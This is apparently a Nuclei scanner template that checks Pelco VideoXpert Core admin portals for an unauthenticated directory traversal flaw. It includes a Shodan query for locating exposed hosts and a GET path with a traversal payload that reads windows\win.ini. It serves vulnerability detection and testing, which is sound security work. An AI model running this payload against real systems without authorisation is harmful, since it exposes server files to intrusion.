nuclei-templates/vulnerabilities/videoxpert-lfi.yaml

30 lines
954 B
YAML
Raw Normal View History

id: videoxpert-lfi
info:
name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal
author: 0x_akoko
severity: high
description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
reference:
- https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
metadata:
verified: true
shodan-query: title:"VideoXpert"
tags: lfi,videoxpert
requests:
- method: GET
path:
- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'
stop-at-first-match: true
matchers:
- type: word
words:
- 'bit app support'
- 'fonts'
- 'extensions'
condition: and
part: body